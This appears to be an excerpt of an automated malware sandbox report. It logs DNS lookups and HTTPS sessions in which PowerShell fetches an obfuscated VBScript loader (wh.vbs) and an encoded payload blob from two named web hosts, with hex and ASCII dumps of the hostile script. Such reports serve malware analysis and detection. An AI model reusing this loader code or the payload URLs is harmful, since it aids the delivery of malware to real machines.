                                                                                                                                                                                        Dec 9, 2024 18:48:23.519946098 CET192.168.2.41.1.1.10x1e15Standard query (0)www.fornid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:50.984781027 CET192.168.2.41.1.1.10x9ff7Standard query (0)www.tdejb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:51.982186079 CET192.168.2.41.1.1.10x9ff7Standard query (0)www.tdejb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.222048044 CET192.168.2.41.1.1.10xfa35Standard query (0)ntp1.hetzner.deA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.222284079 CET192.168.2.41.1.1.10x9369Standard query (0)time.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.223221064 CET192.168.2.41.1.1.10xb553Standard query (0)gbg1.ntp.seA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.223221064 CET192.168.2.41.1.1.10x3bc8Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.223967075 CET192.168.2.41.1.1.10x8d1cStandard query (0)ntp.nict.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.223967075 CET192.168.2.41.1.1.10xd298Standard query (0)ntp1.net.berkeley.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.226140976 CET192.168.2.41.1.1.10x3437Standard query (0)x.ns.gin.ntt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:14.216785908 CET192.168.2.41.1.1.10xd298Standard query (0)ntp1.net.berkeley.eduA (IP address)IN (0x0001)false

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                        Dec 9, 2024 18:48:00.822352886 CET1.1.1.1192.168.2.40x573dNo error (0)www.tequila.aetequila.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:00.822352886 CET1.1.1.1192.168.2.40x573dNo error (0)tequila.ae209.124.66.28A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:03.485568047 CET1.1.1.1192.168.2.40xe9b0No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:03.485568047 CET1.1.1.1192.168.2.40xe9b0No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:08.793212891 CET1.1.1.1192.168.2.40xf0c4No error (0)www.ftsengineers.comftsengineers.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:08.793212891 CET1.1.1.1192.168.2.40xf0c4No error (0)ftsengineers.com103.53.42.63A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:08.800582886 CET1.1.1.1192.168.2.40xf0c4No error (0)www.ftsengineers.comftsengineers.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:08.800582886 CET1.1.1.1192.168.2.40xf0c4No error (0)ftsengineers.com103.53.42.63A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:24.056361914 CET1.1.1.1192.168.2.40x1e15No error (0)www.fornid.comfornid.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:24.056361914 CET1.1.1.1192.168.2.40x1e15No error (0)fornid.com93.95.216.175A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:51.984911919 CET1.1.1.1192.168.2.40x9ff7No error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:51.984911919 CET1.1.1.1192.168.2.40x9ff7No error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:52.119791985 CET1.1.1.1192.168.2.40x9ff7No error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:52.119791985 CET1.1.1.1192.168.2.40x9ff7No error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:57.731781006 CET1.1.1.1192.168.2.40x7fddNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:57.731781006 CET1.1.1.1192.168.2.40x7fddNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.361008883 CET1.1.1.1192.168.2.40x9369No error (0)time.facebook.com129.134.25.123A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.361546993 CET1.1.1.1192.168.2.40x8d1cNo error (0)ntp.nict.jp133.243.238.244A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.361546993 CET1.1.1.1192.168.2.40x8d1cNo error (0)ntp.nict.jp133.243.238.164A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.361546993 CET1.1.1.1192.168.2.40x8d1cNo error (0)ntp.nict.jp133.243.238.163A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.361546993 CET1.1.1.1192.168.2.40x8d1cNo error (0)ntp.nict.jp133.243.238.243A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.361546993 CET1.1.1.1192.168.2.40x8d1cNo error (0)ntp.nict.jp61.205.120.130A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.361938000 CET1.1.1.1192.168.2.40x3bc8No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.453480005 CET1.1.1.1192.168.2.40xfa35No error (0)ntp1.hetzner.de213.239.239.164A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.919181108 CET1.1.1.1192.168.2.40xb553No error (0)gbg1.ntp.segbg1.ntp.netnod.seCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.919181108 CET1.1.1.1192.168.2.40xb553No error (0)gbg1.ntp.netnod.se194.58.203.20A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:13.941545010 CET1.1.1.1192.168.2.40x3437No error (0)x.ns.gin.ntt.net129.250.35.250A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:14.574203014 CET1.1.1.1192.168.2.40xd298No error (0)ntp1.net.berkeley.edu169.229.128.134A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:49:14.574259996 CET1.1.1.1192.168.2.40xd298No error (0)ntp1.net.berkeley.edu169.229.128.134A (IP address)IN (0x0001)false

                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • www.tequila.ae
                                                                                                                                                                                        • www.ftsengineers.com
                                                                                                                                                                                        • www.fornid.com
                                                                                                                                                                                        • www.tdejb.com

                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.449730209.124.66.284437540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-09 17:48:02 UTC168OUTGET /wh/wh.vbs HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                        Host: www.tequila.ae
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-12-09 17:48:02 UTC592INHTTP/1.1 200 OK
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        cache-control: public, max-age=0
                                                                                                                                                                                        expires: Mon, 09 Dec 2024 17:48:02 GMT
                                                                                                                                                                                        content-type: text/vbscript
                                                                                                                                                                                        last-modified: Mon, 09 Dec 2024 14:12:21 GMT
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-length: 33059
                                                                                                                                                                                        date: Mon, 09 Dec 2024 17:48:02 GMT
                                                                                                                                                                                        server: LiteSpeed
                                                                                                                                                                                        strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                        2024-12-09 17:48:02 UTC776INData Raw: 0d 0a 0d 0a 0d 0a 53 70 69 6c 64 65 76 61 6e 64 73 62 65 6b 65 6e 64 74 20 3d 20 52 69 67 68 74 28 22 45 70 69 6b 75 72 69 73 6b 65 22 2c 31 39 31 29 0d 0a 0d 0a 0d 0a 0d 0a 53 74 72 61 74 65 67 64 6f 6d 65 73 74 69 73 6b 65 68 61 6d 6d 6f 20 3d 20 53 74 72 61 74 65 67 64 6f 6d 65 73 74 69 73 6b 65 68 61 6d 6d 6f 20 26 20 22 53 6b 61 6e 64 69 6e 61 76 69 73 65 72 69 6e 67 65 72 6e 65 22 20 26 20 22 55 6e 64 65 72 76 61 6c 75 65 22 20 0d 0a 0d 0a 0d 0a 0d 0a 27 50 6c 61 73 6d 6f 64 69 6f 63 61 72 70 6f 75 73 20 6e 6f 6e 61 70 70 61 72 69 74 69 6f 6e 61 6c 20 69 72 67 72 6e 6e 65 73 3f 20 6d 69 63 72 6f 70 68 6f 6e 6f 67 72 61 70 68 3b 0d 0a 27 42 72 61 6b 74 75 64 73 20 63 6c 61 73 70 65 72 20 73 74 76 6e 65 6e 65 0d 0a 0d 0a 53 65 74 20 4e 65 6f 6e 6c 79
                                                                                                                                                                                        Data Ascii: Spildevandsbekendt = Right("Epikuriske",191)Strategdomestiskehammo = Strategdomestiskehammo & "Skandinaviseringerne" & "Undervalue" 'Plasmodiocarpous nonapparitional irgrnnes? microphonograph;'Braktuds clasper stvneneSet Neonly
                                                                                                                                                                                        2024-12-09 17:48:02 UTC14994INData Raw: 6d 65 6e 74 20 3d 20 55 63 61 73 65 28 61 66 73 6b 65 64 73 73 61 6c 75 74 73 6c 61 69 72 64 69 65 64 69 73 29 20 0d 0a 0d 0a 6e 65 78 74 0d 0a 0d 0a 4f 72 6e 69 73 63 6f 70 69 73 74 20 3d 20 4f 72 6e 69 73 63 6f 70 69 73 74 20 2b 20 22 3b 24 42 61 6e 6b 79 3d 27 4d 79 6f 68 65 6d 22 0d 0a 4f 72 6e 69 73 63 6f 70 69 73 74 20 3d 20 4f 72 6e 69 73 63 6f 70 69 73 74 20 2b 20 22 6f 67 6c 6f 62 69 6e 27 3b 3b 24 54 61 64 70 6f 6c 65 6c 22 0d 0a 4f 72 6e 69 73 63 6f 70 69 73 74 20 3d 20 4f 72 6e 69 73 63 6f 70 69 73 74 20 2b 20 22 69 6b 65 6d 6d 75 77 6f 72 64 65 3d 27 43 69 6e 22 0d 0a 27 50 6f 6c 69 74 69 63 69 61 6e 20 66 65 64 74 6c 64 65 72 3b 0d 0a 4f 72 6e 69 73 63 6f 70 69 73 74 20 3d 20 4f 72 6e 69 73 63 6f 70 69 73 74 20 2b 20 22 65 61 6e 67 69 6f 63
                                                                                                                                                                                        Data Ascii: ment = Ucase(afskedssalutslairdiedis) nextOrniscopist = Orniscopist + ";$Banky='Myohem"Orniscopist = Orniscopist + "oglobin';;$Tadpolel"Orniscopist = Orniscopist + "ikemmuworde='Cin"'Politician fedtlder;Orniscopist = Orniscopist + "eangioc
                                                                                                                                                                                        2024-12-09 17:48:02 UTC16384INData Raw: 63 70 44 2c 22 0d 0a 4f 72 6e 69 73 63 6f 70 69 73 74 20 3d 20 4f 72 6e 69 73 63 6f 70 69 73 74 20 2b 20 22 61 6a 75 54 50 72 48 22 0d 0a 4f 72 6e 69 73 63 6f 70 69 73 74 20 3d 20 4f 72 6e 69 73 63 6f 70 69 73 74 20 2b 20 22 2e 69 20 59 69 24 49 64 22 0d 0a 4f 72 6e 69 73 63 6f 70 69 73 74 20 3d 20 4f 72 6e 69 73 63 6f 70 69 73 74 20 2b 20 22 62 20 50 65 53 6f 47 4f 70 79 20 22 0d 0a 27 43 69 72 6b 75 6c 65 72 65 6e 64 65 3f 20 6c 64 65 72 6d 61 63 68 65 74 74 65 72 6e 65 73 2c 20 62 79 67 6e 69 6e 67 73 70 72 6f 6a 65 6b 74 65 72 69 6e 67 65 72 0d 0a 4f 72 6e 69 73 63 6f 70 69 73 74 20 3d 20 4f 72 6e 69 73 63 6f 70 69 73 74 20 2b 20 22 20 6e 20 65 44 4d 65 65 42 65 6c 4b 20 73 4d 75 22 0d 0a 4f 72 6e 69 73 63 6f 70 69 73 74 20 3d 20 4f 72 6e 69 73 63 6f
                                                                                                                                                                                        Data Ascii: cpD,"Orniscopist = Orniscopist + "ajuTPrH"Orniscopist = Orniscopist + ".i Yi$Id"Orniscopist = Orniscopist + "b PeSoGOpy "'Cirkulerende? ldermachetternes, bygningsprojekteringerOrniscopist = Orniscopist + " n eDMeeBelK sMu"Orniscopist = Ornisco
                                                                                                                                                                                        2024-12-09 17:48:02 UTC905INData Raw: 20 27 27 20 42 49 49 43 41 46 63 6b 75 70 37 69 75 61 6a 56 4e 59 4d 79 62 70 75 36 66 6b 2b 46 6a 62 76 71 6e 54 70 63 47 74 64 75 6c 59 71 47 0d 0a 27 27 20 53 49 47 20 27 27 20 43 31 7a 7a 6d 72 37 52 55 4b 43 51 45 35 6a 58 4b 78 43 39 64 32 7a 50 31 4c 4c 68 6d 44 45 72 77 75 47 36 53 35 50 50 70 31 41 31 0d 0a 27 27 20 53 49 47 20 27 27 20 78 59 48 31 59 4a 67 6f 79 36 63 6c 56 56 61 4f 57 57 46 35 34 78 49 62 6e 64 4b 46 32 6a 65 78 32 79 4e 76 31 72 6e 6c 51 4c 6f 78 0d 0a 27 27 20 53 49 47 20 27 27 20 31 70 49 42 43 49 52 6b 48 4d 50 50 49 72 4e 36 6b 65 75 47 69 55 78 65 51 4e 34 53 65 6b 6a 75 61 30 38 57 36 5a 51 38 4c 31 64 68 0d 0a 27 27 20 53 49 47 20 27 27 20 58 32 56 76 53 6d 4b 6c 33 6c 6e 71 49 50 59 62 41 66 51 59 71 34 2b 6c 6f 38 30
                                                                                                                                                                                        Data Ascii: '' BIICAFckup7iuajVNYMybpu6fk+FjbvqnTpcGtdulYqG'' SIG '' C1zzmr7RUKCQE5jXKxC9d2zP1LLhmDErwuG6S5PPp1A1'' SIG '' xYH1YJgoy6clVVaOWWF54xIbndKF2jex2yNv1rnlQLox'' SIG '' 1pIBCIRkHMPPIrN6keuGiUxeQN4Sekjua08W6ZQ8L1dh'' SIG '' X2VvSmKl3lnqIPYbAfQYq4+lo80


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        1192.168.2.449732103.53.42.634437924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-09 17:48:10 UTC182OUTGET /it/Emnernes123.mdp HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                        Host: www.ftsengineers.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-12-09 17:48:11 UTC209INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 09 Dec 2024 17:48:11 GMT
                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                        Last-Modified: Mon, 09 Dec 2024 14:00:56 GMT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 414812
                                                                                                                                                                                        2024-12-09 17:48:11 UTC7983INData Raw: 63 51 47 62 36 77 4b 6f 41 37 74 64 4f 42 6f 41 36 77 4b 37 55 48 45 42 6d 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 68 4e 6f 35 30 58 45 42 6d 33 45 42 6d 34 48 78 6f 56 6e 57 4c 33 45 42 6d 33 45 42 6d 34 48 42 32 33 77 51 41 58 45 42 6d 33 45 42 6d 33 45 42 6d 33 45 42 6d 37 71 75 61 34 67 2f 36 77 4a 6e 42 65 73 43 4e 66 66 72 41 68 54 37 63 51 47 62 4d 63 70 78 41 5a 76 72 41 6b 49 77 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 54 72 41 67 78 56 36 77 49 56 4a 34 48 35 59 2f 71 63 41 48 7a 4d 63 51 47 62 36 77 4a 50 5a 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 33 45 42 6d 34 48 44 6f 76 73 36 41 4f 73 43 41 50 4a 78 41 5a 75 36 64 32 63 6a 47 75 73 43 6b 4f 74 78 41 5a 75 42 36 69 57 36 65 30 58
                                                                                                                                                                                        Data Ascii: cQGb6wKoA7tdOBoA6wK7UHEBmwNcJARxAZtxAZu5hNo50XEBm3EBm4HxoVnWL3EBm3EBm4HB23wQAXEBm3EBm3EBm3EBm7qua4g/6wJnBesCNffrAhT7cQGbMcpxAZvrAkIwiRQLcQGbcQGb0eJxAZtxAZuDwQTrAgxV6wIVJ4H5Y/qcAHzMcQGb6wJPZ4tEJARxAZtxAZuJw3EBm3EBm4HDovs6AOsCAPJxAZu6d2cjGusCkOtxAZuB6iW6e0X
                                                                                                                                                                                        2024-12-09 17:48:11 UTC8000INData Raw: 75 74 61 58 4d 49 39 74 6b 65 72 37 7a 70 37 55 62 52 4e 53 51 75 30 68 39 42 50 70 58 79 77 6e 48 6f 39 55 2f 4b 35 51 55 30 34 4a 34 71 55 45 4e 6f 39 55 62 48 35 55 68 30 37 49 5a 61 4f 53 34 63 62 2f 62 70 79 73 51 7a 79 4b 6e 36 69 52 54 70 44 58 30 63 4f 64 70 35 57 4b 67 32 6d 73 30 4c 30 66 63 34 36 2b 58 45 2b 2f 57 62 51 63 59 5a 34 46 46 71 63 48 47 46 64 43 46 70 35 4d 66 64 4a 32 6c 6c 44 38 4b 30 62 6f 6b 4c 4e 59 49 43 43 64 53 47 6e 79 71 37 7a 51 67 49 31 4c 37 50 4d 45 76 63 43 30 69 52 63 55 69 49 36 4f 4a 4c 63 31 37 50 33 58 4f 71 4c 2b 44 34 4f 77 72 4b 58 55 4f 78 63 33 62 4e 30 67 30 6f 71 58 74 4f 44 33 64 53 79 4d 36 6a 6b 51 69 36 79 42 58 63 52 42 51 54 65 71 36 72 48 68 45 6c 2f 62 31 5a 4b 73 43 53 59 6c 46 39 4f 6c 65 68 61
                                                                                                                                                                                        Data Ascii: utaXMI9tker7zp7UbRNSQu0h9BPpXywnHo9U/K5QU04J4qUENo9UbH5Uh07IZaOS4cb/bpysQzyKn6iRTpDX0cOdp5WKg2ms0L0fc46+XE+/WbQcYZ4FFqcHGFdCFp5MfdJ2llD8K0bokLNYICCdSGnyq7zQgI1L7PMEvcC0iRcUiI6OJLc17P3XOqL+D4OwrKXUOxc3bN0g0oqXtOD3dSyM6jkQi6yBXcRBQTeq6rHhEl/b1ZKsCSYlF9Oleha
                                                                                                                                                                                        2024-12-09 17:48:11 UTC8000INData Raw: 53 79 48 55 44 32 79 4e 76 78 68 4c 50 36 70 76 65 6c 33 53 52 57 4d 52 7a 45 41 42 42 45 48 45 6b 35 33 6a 54 51 41 5a 69 49 6c 63 56 63 4f 6d 5a 78 56 30 75 78 63 6e 62 51 61 68 42 6f 71 48 59 59 67 44 75 78 65 47 6b 50 77 70 35 63 63 37 4e 77 43 70 49 32 55 51 61 6a 44 4d 32 35 55 34 73 63 4f 6c 41 70 6f 64 62 6b 6b 5a 6f 66 2f 51 66 53 74 4a 6b 37 2f 49 49 56 52 62 50 37 77 63 34 71 45 46 42 55 43 4a 6f 7a 50 49 48 44 55 74 42 2f 74 65 37 77 4d 5a 35 30 72 36 5a 65 4e 4e 77 42 69 48 6f 34 76 66 76 67 39 64 38 77 6c 4f 49 41 32 72 79 62 36 6d 6d 44 77 44 55 78 63 72 72 6d 63 36 38 6d 59 59 5a 61 58 69 4e 71 49 63 46 57 39 34 37 6b 61 74 42 38 47 52 45 4c 41 50 46 46 67 66 62 41 4b 6e 54 4f 6c 71 77 6e 75 6a 46 46 67 66 31 4a 44 61 4d 58 59 4d 53 4f 46
                                                                                                                                                                                        Data Ascii: SyHUD2yNvxhLP6pvel3SRWMRzEABBEHEk53jTQAZiIlcVcOmZxV0uxcnbQahBoqHYYgDuxeGkPwp5cc7NwCpI2UQajDM25U4scOlApodbkkZof/QfStJk7/IIVRbP7wc4qEFBUCJozPIHDUtB/te7wMZ50r6ZeNNwBiHo4vfvg9d8wlOIA2ryb6mmDwDUxcrrmc68mYYZaXiNqIcFW947katB8GRELAPFFgfbAKnTOlqwnujFFgf1JDaMXYMSOF
                                                                                                                                                                                        2024-12-09 17:48:11 UTC8000INData Raw: 39 59 58 6e 54 51 41 62 65 32 78 54 4c 6f 6d 5a 67 64 52 77 56 67 48 4b 62 6e 2b 70 46 33 6d 65 46 70 39 36 76 51 59 50 45 33 56 45 6e 6c 79 53 53 79 36 70 43 70 76 4d 63 47 36 30 4e 47 34 50 76 70 6b 2b 6c 4e 48 71 69 66 6d 43 6e 56 62 4a 74 79 6a 61 45 52 79 4a 77 36 64 7a 43 37 66 66 46 30 62 6b 6a 34 67 4b 69 6f 55 50 49 59 7a 33 46 34 61 6e 64 67 42 69 69 6f 65 6c 48 7a 6e 62 4e 4d 57 6f 73 52 61 37 4f 37 64 69 46 78 51 6e 4c 70 39 74 53 52 43 4c 76 5a 4c 4d 53 41 52 53 76 4a 52 66 4f 61 70 2b 6d 32 63 6e 61 49 31 4a 45 6d 46 63 62 70 4b 74 78 36 45 67 54 6e 75 54 46 30 43 44 45 30 51 69 69 6f 49 54 4c 4c 62 50 46 30 48 42 4f 73 6f 79 69 6b 46 38 4d 45 33 37 4e 45 49 62 76 4f 4f 54 6a 6d 41 57 31 74 79 4e 43 79 39 54 64 74 5a 41 6a 35 42 6a 47 72 7a
                                                                                                                                                                                        Data Ascii: 9YXnTQAbe2xTLomZgdRwVgHKbn+pF3meFp96vQYPE3VEnlySSy6pCpvMcG60NG4Pvpk+lNHqifmCnVbJtyjaERyJw6dzC7ffF0bkj4gKioUPIYz3F4andgBiioelHznbNMWosRa7O7diFxQnLp9tSRCLvZLMSARSvJRfOap+m2cnaI1JEmFcbpKtx6EgTnuTF0CDE0QiioITLLbPF0HBOsoyikF8ME37NEIbvOOTjmAW1tyNCy9TdtZAj5BjGrz
                                                                                                                                                                                        2024-12-09 17:48:12 UTC8000INData Raw: 76 58 44 37 74 51 64 4e 37 41 57 5a 45 4c 4a 56 32 49 69 4f 44 2b 71 4b 32 55 57 43 38 59 68 6e 59 33 79 74 62 43 70 6e 32 43 47 4d 33 43 30 2b 51 4a 6f 50 50 4a 6c 31 46 6f 61 4e 32 59 78 52 36 51 4f 6b 77 64 79 51 4c 45 6f 59 4c 5a 32 34 56 65 55 48 66 63 57 4b 4c 2b 51 39 7a 6d 6f 6d 45 56 73 58 54 72 55 66 38 34 57 65 6a 79 69 53 6b 34 75 45 46 32 4b 76 45 57 30 75 2f 52 64 65 39 58 54 4d 32 56 52 63 41 6e 4c 4b 4a 61 32 37 36 4c 55 50 79 6d 55 30 65 64 75 44 6e 6c 66 46 6c 67 4e 5a 59 63 70 4f 74 78 73 66 59 70 66 68 42 36 7a 4b 4a 42 42 72 6f 44 53 4b 6e 36 41 74 39 70 77 4e 51 52 43 4b 6f 31 32 51 67 49 31 4a 4c 70 37 36 7a 52 79 4a 77 36 64 55 68 2f 30 7a 46 30 59 4d 4b 57 45 43 69 75 63 74 6a 34 79 37 46 79 66 63 4d 68 77 57 69 6f 59 71 5a 48 34
                                                                                                                                                                                        Data Ascii: vXD7tQdN7AWZELJV2IiOD+qK2UWC8YhnY3ytbCpn2CGM3C0+QJoPPJl1FoaN2YxR6QOkwdyQLEoYLZ24VeUHfcWKL+Q9zmomEVsXTrUf84WejyiSk4uEF2KvEW0u/Rde9XTM2VRcAnLKJa276LUPymU0eduDnlfFlgNZYcpOtxsfYpfhB6zKJBBroDSKn6At9pwNQRCKo12QgI1JLp76zRyJw6dUh/0zF0YMKWECiuctj4y7FyfcMhwWioYqZH4
                                                                                                                                                                                        2024-12-09 17:48:12 UTC8000INData Raw: 5a 4f 41 35 58 36 39 6b 4e 5a 37 55 57 76 77 56 70 64 55 67 44 49 71 73 54 56 43 66 4a 75 4c 36 31 30 31 59 4b 78 5a 63 43 55 45 51 69 69 35 56 6c 5a 36 4c 6e 5a 53 41 6a 55 75 64 35 42 44 63 48 33 61 35 7a 52 69 49 6a 4a 37 4e 68 37 32 43 79 33 48 78 71 69 43 62 58 46 6b 36 47 34 69 78 73 6b 5a 38 43 6c 56 37 64 38 77 45 31 78 33 41 39 64 4d 38 31 6d 63 61 76 6b 6b 50 6c 78 68 68 50 6d 4c 2f 6b 4c 42 33 47 68 38 53 6a 44 33 62 46 57 71 66 54 78 52 59 48 58 6e 42 6f 71 41 48 2f 6a 4f 42 6f 44 4b 50 51 67 37 66 36 6f 64 4f 33 63 79 70 79 43 71 50 51 48 74 5a 6e 50 74 4f 48 76 48 59 71 49 6e 43 2f 32 36 59 72 4f 63 2f 41 36 46 6c 5a 76 36 67 5a 36 4c 4d 71 64 53 4c 75 67 65 68 4b 4f 6a 6f 38 4e 4d 48 6a 65 54 52 39 34 33 6a 54 61 41 61 53 43 6c 39 57 63 4f
                                                                                                                                                                                        Data Ascii: ZOA5X69kNZ7UWvwVpdUgDIqsTVCfJuL6101YKxZcCUEQii5VlZ6LnZSAjUud5BDcH3a5zRiIjJ7Nh72Cy3HxqiCbXFk6G4ixskZ8ClV7d8wE1x3A9dM81mcavkkPlxhhPmL/kLB3Gh8SjD3bFWqfTxRYHXnBoqAH/jOBoDKPQg7f6odO3cypyCqPQHtZnPtOHvHYqInC/26YrOc/A6FlZv6gZ6LMqdSLugehKOjo8NMHjeTR943jTaAaSCl9WcO
                                                                                                                                                                                        2024-12-09 17:48:12 UTC8000INData Raw: 4e 70 4c 49 77 56 5a 43 71 42 31 66 69 48 6b 31 44 71 70 79 48 4b 57 34 69 7a 49 2f 44 66 62 6f 62 6e 53 42 53 53 79 50 72 6c 45 51 69 39 49 66 63 42 7a 77 75 6b 6c 42 37 6b 2f 65 6d 70 76 76 75 70 51 6e 70 69 6e 4d 4c 59 58 7a 74 34 76 77 54 4c 32 75 48 67 6e 55 6a 47 56 6d 71 6f 30 33 74 77 6d 56 46 42 43 46 6a 62 6b 48 57 50 74 74 47 44 34 64 50 7a 53 42 7a 36 68 33 4c 30 6a 78 78 67 68 63 34 76 51 2f 58 73 6f 30 71 46 6e 5a 4a 6e 30 78 2f 5a 63 31 50 73 78 4f 2b 71 72 56 46 4a 62 35 71 6a 56 30 71 31 71 49 6c 62 72 6d 6a 77 71 6e 2f 51 61 61 69 4c 7a 51 41 6f 31 4a 45 4c 61 34 6a 38 69 45 6a 44 62 50 6b 2f 32 64 43 63 6e 75 74 64 4b 32 6d 4a 6b 55 69 49 37 70 49 2f 43 4e 53 53 79 4d 52 54 55 51 69 37 53 65 5a 4b 38 4b 63 43 42 6b 4f 53 65 75 4b 4a 4b
                                                                                                                                                                                        Data Ascii: NpLIwVZCqB1fiHk1DqpyHKW4izI/DfbobnSBSSyPrlEQi9IfcBzwuklB7k/empvvupQnpinMLYXzt4vwTL2uHgnUjGVmqo03twmVFBCFjbkHWPttGD4dPzSBz6h3L0jxxghc4vQ/Xso0qFnZJn0x/Zc1PsxO+qrVFJb5qjV0q1qIlbrmjwqn/QaaiLzQAo1JELa4j8iEjDbPk/2dCcnutdK2mJkUiI7pI/CNSSyMRTUQi7SeZK8KcCBkOSeuKJK
